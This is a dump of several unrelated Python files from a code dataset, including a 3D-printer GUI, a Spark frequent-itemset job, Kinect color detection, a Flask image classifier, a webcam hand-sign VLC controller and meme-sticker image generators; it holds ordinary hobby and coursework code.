#self.ui.verticalSlider.valueChanged['int'].connect(self.ui.layernumb.setValue(self.ui.verticalSlider.value()))\r\n #self.ui.verticalSlider.setEnabled(True)\r\n # self.disp_layers(0)\r\n def Printer_disconnected(self):\r\n #disconnect printer\r\n # code to be written here to disconnect printer\r\n #\r\n self.ui.label_3.setText(\"Disconnected\")\r\n self.ui.textBrowser.append('Printer is Disconnected')\r\n #self.ui.textBrowser.setText('Printer is Disconnected')\r\n \r\n def openSlic3r(self):\r\n #self.MainWindow.setEnabled(False)\r\n #subprocess.call(['C:\\Program Files\\Repetier-Host\\Slic3r\\Slic3r.exe'])\r\n process =subprocess.Popen('C:\\Program Files\\Repetier-Host\\Slic3r\\Slic3r.exe', shell=False)\r\n \r\n #self.MainWindow.setEnabled(True)\r\n# def tabSelected(self, arg=0):\r\n# 
print(arg)\r\n# if(arg ==0):\r\n# self.draw()\r\n \r\n \r\n def update_2d(self):\r\n layer_value = self.ui.layernumb.value()\r\n print(layer_value)\r\n \r\n self.ax1 = self.draw2d(self.ax1,layer_value)\r\n \r\n self._canvas1.draw()\r\n #self.ui.layernumb.setValue(layer_value)\r\n \r\n \r\n \r\n \r\n \r\n def create_fig(self,proj,xlim,ylim):\r\n #sns.set()\r\n plt.style.use('seaborn')\r\n self._canvas = FigureCanvas(Figure(figsize=(8.7,5.3),dpi =100))\r\n \r\n if(proj == \"2d\"):\r\n self.ax = self._canvas.figure.add_subplot(111)\r\n \r\n self.ax.set_xlim([0, xlim]) #2125\r\n self.ax.set_ylim([0, ylim]) #2125\r\n # self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n self._canvas.figure.tight_layout()\r\n self._canvas.move(-45,-30)\r\n return self._canvas,self.ax\r\n \r\n if(proj == \"3d\"):\r\n self.ax = self._canvas.figure.add_subplot(111,projection ='3d')\r\n self.ax.set_xlim([0, xlim]) #2125\r\n self.ax.set_ylim([0, ylim]) #2125\r\n self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n self._canvas.figure.tight_layout()\r\n self._canvas.move(-50,-30)\r\n return self._canvas,self.ax\r\n \r\n def draw3d(self,axes,layers):\r\n axes.clear()\r\n for j in range(0,layers):\r\n layer_data = self.image_converter.getlayer_data(j)\r\n for i in range(0,len(layer_data)):\r\n \r\n path = Path(layer_data[i])\r\n patch = patches.PathPatch(path)\r\n axes.add_patch(patch)\r\n art3d.pathpatch_2d_to_3d(patch, z=j, zdir='z')\r\n \r\n ylim = self.image_converter.img_getheight() +100\r\n xlim = self.image_converter.img_getWidth() + 100\r\n axes.set_xlim([0, xlim]) #2125\r\n axes.set_ylim([0, ylim]) #2125\r\n axes.set_zlim([0,layers + 10])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n axes.set_xticks(major_ticks)\r\n axes.set_xticks(minor_ticks, minor=True)\r\n axes.set_yticks(major_ticks)\r\n axes.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n axes.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n axes.grid(which='minor', alpha=0.2)\r\n axes.grid(which='major', alpha=0.5)\r\n return axes\r\n def draw2d(self,axes,layer):\r\n axes.clear()\r\n layer_data = self.image_converter.getlayer_data(layer)\r\n for i in range(0,len(layer_data)):\r\n path = Path(layer_data[i])\r\n patch = patches.PathPatch(path)\r\n axes.add_patch(patch)\r\n ylim = self.image_converter.img_getheight() +100\r\n xlim = self.image_converter.img_getWidth() + 100\r\n axes.set_xlim([0, xlim]) #2125\r\n axes.set_ylim([0, ylim]) #2125\r\n \r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n axes.set_xticks(major_ticks)\r\n 
axes.set_xticks(minor_ticks, minor=True)\r\n axes.set_yticks(major_ticks)\r\n axes.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n axes.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n axes.grid(which='minor', alpha=0.2)\r\n axes.grid(which='major', alpha=0.5)\r\n \r\n return axes\r\n \r\n \r\n#if __name__.endswith('__main__'):\r\n #m = Main_PROGRAM()\r\n # m.link_ui()\r\nif __name__=='__main__':\r\n \r\n app = QtWidgets.QApplication(sys.argv)\r\n \r\n# file = QtCore.QFile(\"dark.qss\")\r\n# file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text)\r\n# stream = QtCore.QTextStream(file)\r\n# app.setStyleSheet(stream.readAll())\r\n \r\n \r\n m = Main_PROGRAM()\r\n\r\n \r\n app.aboutToQuit.connect(m.close_connection)\r\n sys.exit(app.exec_())\r\n #sys.exit(app.exec_())\r\n #app.aboutToQuit.connect(sys.exit(app.exec_()) )\r\n #m.MainWindow.show()\r\n# if app.exec_() ==0 and m.check_connection == True:\r\n# \r\n# m.close_connection()\r\n# print(\"closed\")\r\n \r\n ","sub_path":"Main_PROGRAM.py","file_name":"Main_PROGRAM.py","file_ext":"py","file_size_in_byte":25467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462327521","text":"#Lesson09\n#Objected Oriented Mailroom Exercise 09 - CLI Menu\n#\n#!/usr/bin/env python3\n#importe modules\nfrom donor_models import *\nfrom pathlib import Path\nfrom sys import exit\nimport os\n\n## OK so this ended up turning more into a config file than the menu cli since\n# the menus were all created as classes in the donor_models.py file.\n\n\n\n#define variables\n\ndata_folder = r'C:\\pythonuw\\Fall2018-PY210A\\students\\ericstreit\\files'\n# note to self: make another one like above for the instructor that points to the current folder?\n\n#define menus\n# This creates the menu as a class\n\n#should the other menus be subclasses??? probably! 
(DONE!)\n\nmain_menu = Menu(\"MAIN MENU\")\nreport_menu = Report(\"REPORT MENU\")\nthankyou_menu = ThankYou(\"SEND A THANK YOU\")\n\n\n# define menu options\n# These are the choices that will display to the user in a menu\n# Be sure to create a dictionary below that will tie to the choices\n\nmain_menu.menu_options = [\"(R)eport Menu\", \"(S)end a Thank You\",\n \"(A)dd a new donation\",\n \"(Q)uit\"]\n\n\nreport_menu.menu_options = [\"Create report of (A)ll donors\",\n \"Create report of a (S)ingle donor\",\n \"(B)ack to Main Menu\",\n \"(Q)uit\"]\n\n\n\nthankyou_menu.menu_options = [\"Send a Thank You to a (S)ingle donor\",\n \"Send a Thank You to (A)ll donors\",\n \"(B)ack to Main Menu\",\n \"(Q)uit\"]\n\n\n\n#define the menu dictionaries\n#each selection should point to a function\n\nmain_menu.dict = {\"r\": report_menu.menu, \"s\": thankyou_menu.menu, \"a\": main_menu.new_donation, \"q\": main_menu.quit}\nreport_menu.dict = {\"a\": report_menu.full_donor_report, \"s\": report_menu.single_donor_report, \"b\": main_menu.menu, \"q\": report_menu.quit}\nthankyou_menu.dict = {\"a\": thankyou_menu.all_donor_thankyou, \"s\": thankyou_menu.single_donor_thankyou, \"b\": main_menu.menu, \"q\": thankyou_menu.quit}\n\n#let's put some donors in here for testing!\n\nhestershaw = Donors(\"Hester Shaw\")\ndonor_dict['hestershaw'] = hestershaw\nhestershaw.add_donations(500)\nhestershaw.add_donations(34)\n\ngrike = Donors(\"Grike\")\ndonor_dict['grike'] = grike\ngrike.add_donations(3)\n\ntomnatsworthy = Donors(\"Tom Natsworthy\")\ndonor_dict['tomnatsworthy'] = tomnatsworthy\ntomnatsworthy.add_donations(1003)\ntomnatsworthy.add_donations(745)\ntomnatsworthy.add_donations(10)\n\n# run the program! (guarded so that importing this module does not launch the menu)\nif __name__ == \"__main__\":\n main_menu.menu()\n","sub_path":"students/ericstreit/session09/cli_main.py","file_name":"cli_main.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569757828","text":"from itertools import combinations\nimport math\nfrom operator import add\nfrom pyspark import SparkContext\nimport sys\nimport time\n\n\ndef get_C1(dataset):\n\n C1 = dict()\n for li in dataset:\n for element in li:\n if element not in C1:\n C1[element] = 1\n else:\n C1[element] += 1\n\n return C1\n\n\ndef Lk_to_Ck(dataset, Lk, k):\n\n Ck = dict()\n for li in dataset:\n li = sorted(set(li) & set(Lk))\n #print('li:', li)\n for item in combinations(li, k):\n item = tuple(item)\n if item not in Ck:\n Ck[item] = 1\n else:\n Ck[item] += 1\n\n return Ck\n\n\ndef Ck_to_Lk(Ck, support):\n\n Lk = list()\n for key, val in Ck.items():\n if val >= support:\n Lk.append(key)\n\n return sorted(Lk)\n\n\ndef find_candidates(dataset, support, whole_size):\n\n frequent_itemsets = []\n\n # initialize partition support threshold\n partition = list(dataset)\n p = len(partition) / whole_size\n ps = math.ceil(p * support)\n\n # get all singletons\n C1 = get_C1(partition)\n #print('C1:', C1)\n L1 = Ck_to_Lk(C1, ps)\n # str to tuple\n frequent_itemsets.append([(item,) for item in L1])\n\n # initialize combination length\n k = 2\n\n while True:\n #print('L1:',L1)\n Ck = Lk_to_Ck(partition, L1, k)\n #print('Ck:',Ck)\n Lk = Ck_to_Lk(Ck, ps)\n if Lk == []:\n break\n frequent_itemsets.append(Lk)\n # update L1\n L1 = set()\n for item in Lk:\n L1 = L1 | set(item)\n k += 1\n\n return frequent_itemsets\n\n\ndef find_frequent_itemsets(dataset, candidates):\n\n result_dict = dict()\n for li in dataset:\n for item in candidates:\n if set(item).issubset(li):\n if item not in result_dict:\n result_dict[item] = 1\n else:\n result_dict[item] += 1\n\n result_li = [(key, value) for key, value in result_dict.items()]\n\n return result_li\n
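\n# --- Editor's sketch, not part of the original homework solution: a tiny\n# A-Priori trace for the helpers above, assuming a support threshold of 2.\n#   dataset = [['a', 'b'], ['a', 'c'], ['a', 'b']]\n#   get_C1(dataset)                  -> {'a': 3, 'b': 2, 'c': 1}\n#   Ck_to_Lk(get_C1(dataset), 2)     -> ['a', 'b']\n#   Lk_to_Ck(dataset, ['a', 'b'], 2) -> {('a', 'b'): 2}\n# find_candidates() repeats this loop per Spark partition with a scaled-down\n# threshold (SON phase 1); find_frequent_itemsets() then recounts the surviving\n# candidates so that phase 2 can sum exact global counts.\n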
\ndef format_itemsets(data): # named to avoid shadowing the builtin format()\n\n result = ''\n length = 1\n for item in data:\n if len(item) == 1:\n result += str(item).replace(',', '') + ','\n elif len(item) == length:\n result += str(item) + ','\n else:\n result += '\\n\\n'\n result += str(item) + ','\n length = len(item)\n\n result = result.replace(',\\n\\n', '\\n\\n')[:-1]\n\n return result\n\n\nif __name__ == '__main__':\n start = time.time()\n case_number = sys.argv[1]\n support = int(sys.argv[2])\n input_file_path = sys.argv[3]\n output_file_path = sys.argv[4]\n\n sc = SparkContext.getOrCreate()\n\n # Generate basket model\n rdd = sc.textFile(input_file_path)\n header = rdd.first()\n\n if case_number == '1':\n new_rdd = rdd.filter(lambda x: x != header) \\\n .map(lambda x: (x.split(',')[0], x.split(',')[1])) \\\n .groupByKey() \\\n .map(lambda x: list(set(x[1])))\n elif case_number == '2':\n new_rdd = rdd.filter(lambda x: x != header) \\\n .map(lambda x: (x.split(',')[1], x.split(',')[0])) \\\n .groupByKey() \\\n .map(lambda x: list(set(x[1])))\n\n whole_size = new_rdd.count()\n\n # Phase 1\n candidates = new_rdd.mapPartitions(lambda partition: find_candidates(partition, support, whole_size)) \\\n .flatMap(lambda x: x) \\\n .distinct() \\\n .sortBy(lambda x: (len(x), x)).collect()\n\n #print(candidates)\n\n # Phase 2\n frequent_itemsets = new_rdd.mapPartitions(lambda partition: find_frequent_itemsets(partition, candidates)) \\\n .reduceByKey(add) \\\n .filter(lambda x: x[1] >= support) \\\n .map(lambda x: x[0]) \\\n .sortBy(lambda x: (len(x), x)).collect()\n\n #print(frequent_itemsets)\n\n with open(output_file_path, 'w+') as fout:\n fout.write('Candidates:\\n' + format_itemsets(candidates) + '\\n\\n' + 'Frequent Itemsets:\\n' + format_itemsets(frequent_itemsets))\n\n end = time.time()\n print('Duration: {}'.format(end - start))\n\n","sub_path":"HW2-FrequentItemsets/src/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23939806","text":"import sys\nimport cv2\nimport numpy as np\nimport freenect\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# def mouse_callback(event,x,y,flags,param):\n# \tr = img[y][x][2]\n# \tg = img[y][x][1]\n# \tb = img[y][x][0]\n# \th = hsv[y][x][0]\n# \ts = hsv[y][x][1]\n# \tv = hsv[y][x][2]\n# \toutput_rgb = \"R:%d, G:%d, B:%d \" % (r, g, b)\n# \toutput_hsv = \"H:%d, S:%d, V:%d\" % (h, s, v)\n# \ttmp = hsv.copy()\n# \tcv2.putText(tmp,output_rgb, (10,20), font, 0.5, (0,0,0))\n# \tcv2.putText(tmp,output_hsv, (10,40), font, 0.5, (0,0,0))\n# \tcv2.imshow('window', tmp)\n# \tif event == cv2.EVENT_LBUTTONDOWN:\n# \t\tprint \"bgr: (%d, %d, %d) \\nhsv: (%d, %d, %d)\" % (b,g,r,h,s,v)\n\n#############################################################################\n\n# STARTING THE PROGRAM HERE #\n\n\n# Loading the frame from the Kinect Camera\nimg = freenect.sync_get_video()[0]\n\n# Converting the Camera frame from RGB to HSV\nbgr_frame = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\nhsv = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2HSV)\n
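\n# --- Editor's note, not in the original script: OpenCV stores hue in 0-179 for\n# 8-bit images, so upper hue bounds above 179 in the arrays below (e.g. the 200\n# used for 'yellow') simply act as \"no upper cut\" on the hue channel.\n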
# Storing the HSV range for the colors to be thresholded\n\ncolor_order=['yellow','orange','pink','black','blue','green','purple','red']\ncolor_lower_array=np.array([[0,0,0],[0,100,170],[165,90,210],[0,20,20],[20,110,20],[40,5,88],[140,70,80],[169,120,120]])\ncolor_higher_array=np.array([[200,255,255],[40,255,210],[173,215,255],[180,110,80],[110,130,80],[80,150,200],[160,150,210],[180,255,210]])\n\n# Performing Operations on camera frames to process the output for all the colors\n\nfor i in range(0,len(color_lower_array)):\n# \t# Thresholding the image\n\tmask = cv2.inRange(hsv, color_lower_array[i], color_higher_array[i])\n\n# \t# Performing Morphological Operations on image\n\topening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)))\n\tclosing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)))\n\n# \t# Detecting the contours\n\tim2, contours, hierarchy = cv2.findContours(closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE) # three return values is the OpenCV 3.x API; OpenCV 4.x drops im2\n\n\tprint(contours)\n# \t# Find the largest contour\n\t# contour_sizes = [(cv2.contourArea(contour), contour) for contour in contours]\n\t# biggest_contour = max(contour_sizes, key=lambda x: x[0])[1]\n\n# \t# Drawing the largest contour\n\t# cv2.drawContours(img, contours, -1, (255,255,0), 3)\n\n# \t# Drawing a bounding rectangle for the detected box\n# \trect = cv2.minAreaRect(biggest_contour)\n# \tbox = cv2.boxPoints(rect)\n# \tbox = np.int0(box)\n# \tcenter=rect[0]\n# \tangle = rect[2]\n# \tcv.drawContours(img,[box],0,(0,0,255),2)\n\n# \t# Marking the center of the box\n# \timg[int(center[1])-2:int(center[1])+2,int(center[0])-2:int(center[0])+2]=[0,0,255]\n\n# \t# Determining the rotation matrix\n# \trows, cols = img.shape[:2]\n# \trot = cv2.getRotationMatrix2D(center, angle-90, 1)\n# \tprint(rot)\n# \t# img = cv.warpAffine(img, rot, (rows,cols))\n\n# \t# Center of Mass of the detected contour\n# \t# M = cv.moments(biggest_contour)\n# \t# print(\"M is\", M )\n\n# \t# cx = int(M['m10']/M['m00'])\n# \t# cy = int(M['m01']/M['m00'])\n\n# \t# # Printing the COM coordinates of the detected object\n# \t# print (\"Cx is \", cx)\n# \t# print (\"Cy is \", cy)\n\n# \t# # Marking the COM on the image\n# \t# img[cy-2:cy+2,cx-2:cx+2]=[0,0,255]\n\ncv2.namedWindow(\"window\",cv2.WINDOW_AUTOSIZE)\ncv2.imshow('window', closing)\n\n# cv2.setMouseCallback(\"window\",mouse_callback)\n\nwhile True:\n\tch = 0xFF & cv2.waitKey(10)\n\tif ch == 0x1B:\n\t\tbreak\ncv2.destroyAllWindows()","sub_path":"blob_kinect.py","file_name":"blob_kinect.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578332140","text":"from flask import Flask\nfrom flask import request\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport json\napp = Flask(__name__)\n\n@app.route(\"/predict\",methods=[\"POST\"])\ndef predict():\n # note: reloading the pretrained model on every request is slow; hoisting this to module level would be cheaper\n model = torch.hub.load('pytorch/vision:v0.4.2', 'densenet121', pretrained=True)\n model.eval()\n filename = request.files['file']\n input_image = Image.open(filename)\n data_preprocessing = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n scores = model(data_preprocessing(input_image).unsqueeze(0))\n class_prob = torch.nn.functional.softmax(scores[0], dim=0)\n class_ids = json.load(open(\"app/imagenet_class_index.json\"))\n labels = [class_ids[str(k)][1] for k in range(len(class_ids))]\n predicted_labels = {}\n count = 1\n for idx in class_prob.sort()[1][-10:]: # indices of the 10 most probable classes, ascending, so key 10 is the top-1 guess\n predicted_labels[count] = labels[idx]\n count += 1\n return predicted_labels\n
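\n# --- Editor's usage sketch, not part of the original app; the URL and the\n# image path are placeholder assumptions. ---\n# import requests\n# resp = requests.post(\"http://localhost:5000/predict\",\n#                      files={\"file\": open(\"cat.jpg\", \"rb\")})\n# print(resp.json())\n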
\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',debug=True)","sub_path":"project-3-group-7/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109172906","text":"# -*- coding: utf-8 -*-\n\nimport time\n\nimport cv2\nimport numpy as np\nimport torch\n\nfrom cnn import load_model\nfrom image import crop_square_region, normalize_image_input\nfrom segmentation_main import getContours, segmentation_contour\nfrom testing import find_sign_group, predict_sign\nfrom vlc_media_player import VLCController\n\n\ndef main():\n # VLC controller\n vlc_control = VLCController(DELAY=3)\n\n # Use Webcam\n webcam = cv2.VideoCapture(0) # the only camera is the laptop's built-in one\n webcam.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # property id for the frame width in pixels\n webcam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # property id for the frame height in pixels\n webcam.set(cv2.CAP_PROP_BRIGHTNESS, 75) # property id for the brightness\n # Load CNN model\n model = load_model(\"0.9392_HandyNet_1607802541.3999255\")[0]\n\n while True:\n # Capture image from webcam\n success, image = webcam.read()\n capture = cv2.flip(image.copy(), flipCode=1)\n sign = None\n\n # Return image of just the hand\n try:\n image_hand = segmentation_contour(capture)\n cv2.imshow(\"Image main\", image_hand)\n # print(\"Image size: {}\".format(image_hand.shape))\n sign = predict_sign(model, image_hand, threshold=0.7)\n except Exception as e:\n print(e)\n\n group = find_sign_group(sign)\n\n capture = cv2.putText(\n capture,\n f\"{sign} {str(group)}\",\n (10, capture.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 2,\n (0, 0, 255),\n thickness=3,\n )\n cv2.imshow(\"Image\", capture)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n vlc_control.run(group)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"582107428","text":"import asyncio\nfrom PIL import Image, ImageDraw, ImageFont\nfrom datetime import date\n\n\nasync def stick_maker_static_traitor(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n \"There is a mole\" meme template\n \"\"\"\n def __handle() -> Image.Image:\n # initialize the background layer\n background = Image.new(mode=\"RGB\", size=(image_wight, image_height), color=(255, 255, 255))\n\n # text layer: the character-count part\n text_num_img = Image.new(mode=\"RGBA\", size=(image_wight, image_height), color=(0, 0, 0, 0))\n font_num_size = 48\n font_num = ImageFont.truetype(font_path, font_num_size)\n ImageDraw.Draw(text_num_img).text(xy=(0, 0), text=f'{len(text)}/100', font=font_num, fill=(255, 255, 255))\n\n # text layer: the main body\n text_main_img = Image.new(mode=\"RGBA\", size=(image_wight, image_height), color=(0, 0, 0, 0))\n font_main_size = 54\n font_main = ImageFont.truetype(font_path, font_main_size)\n # split the text by rendered width\n spl_num = 0\n spl_list = []\n for num in range(len(text)):\n text_w = font_main.getsize_multiline(text[spl_num:num])[0]\n if text_w >= 415:\n spl_list.append(text[spl_num:num])\n spl_num = num\n else:\n # for-else: append the remaining tail once the loop completes\n spl_list.append(text[spl_num:])\n text_main_fin = ''\n for item in spl_list:\n text_main_fin += item + '\\n'\n ImageDraw.Draw(text_main_img).multiline_text(xy=(0, 0), text=text_main_fin, font=font_main, spacing=8,\n fill=(0, 0, 0))\n\n # rotate the text layers\n text_num_img = text_num_img.rotate(angle=-9, expand=True, resample=Image.BICUBIC, center=(0, 0))\n text_main_img = text_main_img.rotate(angle=-9.5, expand=True, resample=Image.BICUBIC, center=(0, 0))\n\n # paste the text layers onto the template image\n background.paste(im=image_file, box=(0, 0))\n background.paste(im=text_num_img, box=(435, 140), mask=text_num_img)\n background.paste(im=text_main_img, box=(130, 160), mask=text_main_img)\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n
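\n# --- Editor's usage sketch, not part of the original plugin; the template and\n# font paths are placeholder assumptions. ---\n# template = Image.open('traitor_template.png')\n# sticker = asyncio.run(stick_maker_static_traitor(\n#     'some text', template, 'msyh.ttf', image_wight=600, image_height=500))\n# sticker.save('out.png')\n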
\nasync def stick_maker_static_jichou(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n \"Holding a grudge\" meme template\n \"\"\"\n def __handle() -> Image.Image:\n # build the main text\n text_ = f\"今天是{date.today().strftime('%Y年%m月%d日')}{text}, 这个仇我先记下了\"\n font_main_size = 42\n font_main = ImageFont.truetype(font_path, font_main_size)\n # split the text by rendered width\n spl_num = 0\n spl_list = []\n for num in range(len(text_)):\n text_w = font_main.getsize_multiline(text_[spl_num:num])[0]\n if text_w >= (image_wight * 7 // 8):\n spl_list.append(text_[spl_num:num])\n spl_num = num\n else:\n # for-else: append the remaining tail once the loop completes\n spl_list.append(text_[spl_num:])\n text_main_fin = '\\n'.join(spl_list)\n\n font = ImageFont.truetype(font_path, font_main_size)\n text_w, text_h = font.getsize_multiline(text_main_fin)\n\n # compose the enlarged canvas\n background_w = image_wight\n background_h = image_height + text_h + 20\n background = Image.new(mode=\"RGB\", size=(background_w, background_h), color=(255, 255, 255))\n\n # paste position: flush with the top\n image_coordinate = (0, 0)\n background.paste(image_file, image_coordinate)\n\n draw = ImageDraw.Draw(background)\n # compute the centered text position\n text_coordinate = (((background_w - text_w) // 2), image_height + 5)\n draw.multiline_text(text_coordinate, text_main_fin, font=font, fill=(0, 0, 0))\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n
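\n# --- Editor's sketch, not part of the original plugin: the width-based line\n# wrapping both functions above implement inline, factored out for clarity;\n# \"measure\" stands in for font.getsize_multiline(...)[0].\ndef _wrap_by_width(text: str, measure, max_width: int) -> list:\n    chunks, start = [], 0\n    for end in range(len(text)):\n        if measure(text[start:end]) >= max_width:\n            chunks.append(text[start:end])\n            start = end\n    else:\n        # for-else: runs once after the loop finishes, flushing the tail\n        chunks.append(text[start:])\n    return chunks\n\n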
\nasync def stick_maker_static_phlogo(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n ph-style logo meme template\n \"\"\"\n def __handle() -> Image.Image:\n # split the text into its white and yellow halves\n test_sentences = text.strip().split(maxsplit=1)\n white_text = test_sentences[0]\n yellow_text = test_sentences[1]\n\n font_size = 640\n font = ImageFont.truetype(font_path, font_size)\n text_w, text_h = font.getsize(text)\n\n y_text_w, y_text_h = font.getsize(yellow_text)\n bg_y_text = Image.new(mode=\"RGB\", size=(round(y_text_w * 1.1), round(text_h * 1.3)), color=(254, 154, 0))\n draw_y_text = ImageDraw.Draw(bg_y_text)\n draw_y_text.text((round(y_text_w * 1.1) // 2, round(text_h * 1.3) // 2),\n yellow_text, anchor='mm', font=font, fill=(0, 0, 0))\n radii = 64\n # draw a circle (used to cut out the four corners)\n circle = Image.new('L', (radii * 2, radii * 2), 0) # black square\n draw_circle = ImageDraw.Draw(circle)\n draw_circle.ellipse((0, 0, radii * 2, radii * 2), fill=255) # white circle inscribed in the black square\n # convert the image so it carries an alpha (transparency) channel\n bg_y_text = bg_y_text.convert(\"RGBA\")\n y_weight, y_height = bg_y_text.size\n # draw the four corners (splitting the circle into four quarters)\n alpha = Image.new('L', bg_y_text.size, 255) # white rectangle the same size as the image; 'L' means grayscale\n alpha.paste(circle.crop((0, 0, radii, radii)), (0, 0)) # top-left corner\n alpha.paste(circle.crop((radii, 0, radii * 2, radii)), (y_weight - radii, 0)) # top-right corner\n alpha.paste(circle.crop((radii, radii, radii * 2, radii * 2)), (y_weight - radii, y_height - radii)) # bottom-right corner\n alpha.paste(circle.crop((0, radii, radii, radii * 2)), (0, y_height - radii)) # bottom-left corner\n bg_y_text.putalpha(alpha) # white areas stay visible, black areas turn transparent\n\n w_text_w, w_text_h = font.getsize(white_text)\n bg_w_text = Image.new(mode=\"RGB\", size=(round(w_text_w * 1.05), round(text_h * 1.3)), color=(0, 0, 0))\n w_weight, w_height = bg_w_text.size\n draw_w_text = ImageDraw.Draw(bg_w_text)\n draw_w_text.text((round(w_text_w * 1.025) // 2, round(text_h * 1.3) // 2),\n white_text, anchor='mm', font=font, fill=(255, 255, 255))\n\n text_bg = Image.new(mode=\"RGB\", size=(w_weight + y_weight, y_height), color=(0, 0, 0))\n text_bg.paste(bg_w_text, (0, 0))\n text_bg.paste(bg_y_text, (round(w_text_w * 1.05), 0), mask=alpha)\n t_weight, t_height = text_bg.size\n\n background = Image.new(mode=\"RGB\", size=(round(t_weight * 1.2), round(t_height * 1.75)), color=(0, 0, 0))\n b_weight, b_height = background.size\n background.paste(text_bg, ((b_weight - t_weight) // 2, (b_height - t_height) // 2))\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n\n__all__ = [\n 'stick_maker_static_traitor',\n 'stick_maker_static_jichou',\n 'stick_maker_static_phlogo'\n]\n","sub_path":"omega_miya/plugins/sticker_maker/utils/static_render.py","file_name":"static_render.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48762702","text":"# -*- coding: latin-1 -*-\n\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom .textmodel.textmodel import TextModel\nfrom .textmodel.texeltree import NULL_TEXEL\n\nfrom .nbtexels import Cell, TextCell, ScriptingCell, mk_textmodel\n\nimport re\n\n\ndef get_cells(texel):\n if isinstance(texel, Cell):\n return [texel]\n r = []\n for i1, i2, child in texel.iter_childs():\n r.extend(get_cells(child))\n return r\n\n\ndef totext(model):\n r = []\n for cell in get_cells(model.texel):\n if isinstance(cell, TextCell):\n text = cell.text.get_text()\n r.append(\"[Text]:\\n\"+text)\n else:\n text = cell.input.get_text()\n if text:\n r.append((\"[In %i]:\\n\"%cell.number)+text)\n text = cell.output.get_text()\n if text:\n r.append((\"[Out %i]:\\n\"%cell.number)+text)\n return u\"\\n\".join(r)\n\n\nrx_out = re.compile('\\\[Out\\\s*(\\\w*)\\\]:$').match\nrx_in = re.compile('\\\[In\\\s*(\\\w*)\\\]:$').match\nrx_text = re.compile('\\\[Text\\\]:$').match\n\ndef fromtext(s, ScriptingCell=ScriptingCell):\n model = TextModel()\n cells = []\n l = []\n fields = [NULL_TEXEL, NULL_TEXEL]\n mode = None\n number = None\n IN = \"IN\"\n OUT = \"OUT\"\n TEXT = \"TEXT\"\n\n def create_texel():\n texel = TextModel(u'\\n'.join(l)).texel\n del l[:]\n return texel\n\n def flush():\n texel = create_texel()\n if not mode:\n return\n if mode == TEXT:\n cell = TextCell(texel)\n else:\n if mode == IN:\n fields[0] = texel\n else:\n fields[1] = texel\n cell = 